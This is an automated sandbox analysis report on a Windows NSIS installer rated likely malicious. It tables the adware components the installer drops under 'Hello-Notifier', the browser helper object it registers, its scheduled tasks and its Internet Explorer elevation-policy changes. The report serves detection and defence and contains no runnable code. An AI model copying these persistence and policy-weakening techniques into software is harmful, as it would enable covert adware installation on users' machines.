Analysis Overview
SHA256
1999c56ab4a4e37c0c4b35f1a859926b1a5c082a12167106de4f955de3f83d25
Threat Level: Likely malicious
The file 1999c56ab4a4e37c0c4b35f1a859926b1a5c082a12167106de4f955de3f83d25N was found to be: Likely malicious.
Malicious Activity Summary
Checks for common network interception software
Loads dropped DLL
Reads user/profile data of web browsers
Event Triggered Execution: Component Object Model Hijacking
Executes dropped EXE
ACProtect 1.3x - 1.4x DLL software
Installs/modifies Browser Helper Object
Checks installed software on the system
UPX packed file
Drops file in Program Files directory
Drops file in Windows directory
Program crash
Enumerates physical storage devices
Unsigned PE
System Location Discovery: System Language Discovery
NSIS installer
System policy modification
Suspicious use of WriteProcessMemory
Modifies registry class
Modifies Internet Explorer settings
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-25 22:18
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
NSIS installer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-25 22:18
Reported
2024-10-25 22:21
Platform
win7-20241010-en
Max time kernel
51s
Max time network
57s
Command Line
Signatures
Checks for common network interception software
ACProtect 1.3x - 1.4x DLL software
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Event Triggered Execution: Component Object Model Hijacking
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-firefoxinstaller.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bg.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Checks installed software on the system
Installs/modifies Browser Helper Object
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311791128} | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311791128}\ = "CrossriderApp0037928" | C:\Windows\system32\regsvr32.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311791128} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311791128}\NoExplorer = "1" | C:\Windows\system32\regsvr32.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311791128} | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311791128} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311791128}\ = "CrossriderApp0037928" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311791128}\NoExplorer = "1" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-firefoxinstaller.exe | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Program Files (x86)\Hello-Notifier\Uninstall.exe | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-helper.exe | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-buttonutil.exe | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-buttonutil.dll | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier.ico | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Program Files (x86)\Hello-Notifier\background.html | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-updater.exe | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Program Files (x86)\Hello-Notifier\37928.xpi | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Program Files (x86)\Hello-Notifier\Installer.log | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-buttonutil64.exe | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-buttonutil64.dll | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bho.dll | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bho64.dll | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bg.exe | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Program Files (x86)\Hello-Notifier\utils.exe | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\Hello-Notifier-codedownloader.job | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| File opened for modification | C:\Windows\Tasks\Hello-Notifier-codedownloader.job | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Windows\Tasks\temp_Hello-Notifier-enabler.job | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Windows\Tasks\Hello-Notifier-updater.job | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| File opened for modification | C:\Windows\Tasks\Hello-Notifier-firefoxinstaller.job | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Windows\Tasks\Hello-Notifier-enabler.job | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| File opened for modification | C:\Windows\Tasks\Hello-Notifier-enabler.job | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| File opened for modification | C:\Windows\Tasks\temp_Hello-Notifier-enabler.job | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| File opened for modification | C:\Windows\Tasks\Hello-Notifier-updater.job | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Windows\Tasks\Hello-Notifier-firefoxinstaller.job | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-firefoxinstaller.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1999c56ab4a4e37c0c4b35f1a859926b1a5c082a12167106de4f955de3f83d25N.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\regsvr32.exe | N/A |
NSIS installer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION\Hello-Notifier-bg.exe = "8000" | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{660BF2E7-F3CE-43D3-96E9-51F45E4EE215} | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8e0202ae-cd8e-4894-b24e-f2cd7839a7f0}\Policy = "3" | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8e0202ae-cd8e-4894-b24e-f2cd7839a7f0} | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8e0202ae-cd8e-4894-b24e-f2cd7839a7f0}\Policy = "3" | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{d0007729-ce2c-4588-ad99-017a0258ae89}\AppName = "Hello-Notifier-buttonutil64.exe" | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{A71C09BB-8724-4A9B-B93E-74A8D2DCE38A} | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0}\AppName = "Hello-Notifier-codedownloader.exe" | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{cbc148be-08f7-4781-8fc7-fd545f7678f0}\AppName = "Hello-Notifier-helper.exe" | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4}\AppName = "Hello-Notifier-bg.exe" | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{A71C09BB-8724-4A9B-B93E-74A8D2DCE38A}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\AdvancedOptions\CRYPTO\PROTECTEDMODESECURITY | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{cbc148be-08f7-4781-8fc7-fd545f7678f0}\AppName = "Hello-Notifier-helper.exe" | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{d0007729-ce2c-4588-ad99-017a0258ae89}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\CRYPTO\PROTECTEDMODESECURITY\DefaultValue = "PMIL" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{d0007729-ce2c-4588-ad99-017a0258ae89} | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{d0007729-ce2c-4588-ad99-017a0258ae89}\Policy = "3" | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4} | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0}\Policy = "3" | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0}\Policy = "3" | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{cbc148be-08f7-4781-8fc7-fd545f7678f0}\Policy = "3" | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8e0202ae-cd8e-4894-b24e-f2cd7839a7f0}\AppName = "Hello-Notifier-buttonutil.exe" | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{660BF2E7-F3CE-43D3-96E9-51F45E4EE215}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\CRYPTO\PROTECTEDMODESECURITY | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8e0202ae-cd8e-4894-b24e-f2cd7839a7f0}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{65021441-ED41-4725-8921-AF5CACAE92F6}\Policy = "3" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{cbc148be-08f7-4781-8fc7-fd545f7678f0}\Policy = "3" | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{d0007729-ce2c-4588-ad99-017a0258ae89}\Policy = "3" | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4}\Policy = "1" | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{65021441-ED41-4725-8921-AF5CACAE92F6}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0} | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\AdvancedOptions\CRYPTO\PROTECTEDMODESECURITY\CheckedValue = "PMIL" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8e0202ae-cd8e-4894-b24e-f2cd7839a7f0}\AppName = "Hello-Notifier-buttonutil.exe" | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{d0007729-ce2c-4588-ad99-017a0258ae89}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{d0007729-ce2c-4588-ad99-017a0258ae89} | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5EFA9B9B-8BA5-4DD0-AA9F-7802DC493E}\Policy = "3" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Approved Extensions | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{d0007729-ce2c-4588-ad99-017a0258ae89}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4}\AppName = "Hello-Notifier-bg.exe" | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0}\AppName = "Hello-Notifier-codedownloader.exe" | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{cbc148be-08f7-4781-8fc7-fd545f7678f0}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{cbc148be-08f7-4781-8fc7-fd545f7678f0}\Policy = "3" | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8e0202ae-cd8e-4894-b24e-f2cd7839a7f0}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{d0007729-ce2c-4588-ad99-017a0258ae89}\AppName = "Hello-Notifier-buttonutil64.exe" | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5EFA9B9B-8BA5-4DD0-AA9F-7802DC493E}\AppName = "Hello-Notifier-enabler.exe-codedownloader.exe" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5EFA9B9B-8BA5-4DD0-AA9F-7802DC493E}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{cbc148be-08f7-4781-8fc7-fd545f7678f0} | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8e0202ae-cd8e-4894-b24e-f2cd7839a7f0}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8e0202ae-cd8e-4894-b24e-f2cd7839a7f0}\AppName = "Hello-Notifier-buttonutil.exe" | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4} | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4}\Policy = "1" | C:\Users\Admin\AppData\Local\Temp\nseFCC8.tmp\Ewfmukuhwkg.exe | N/A |
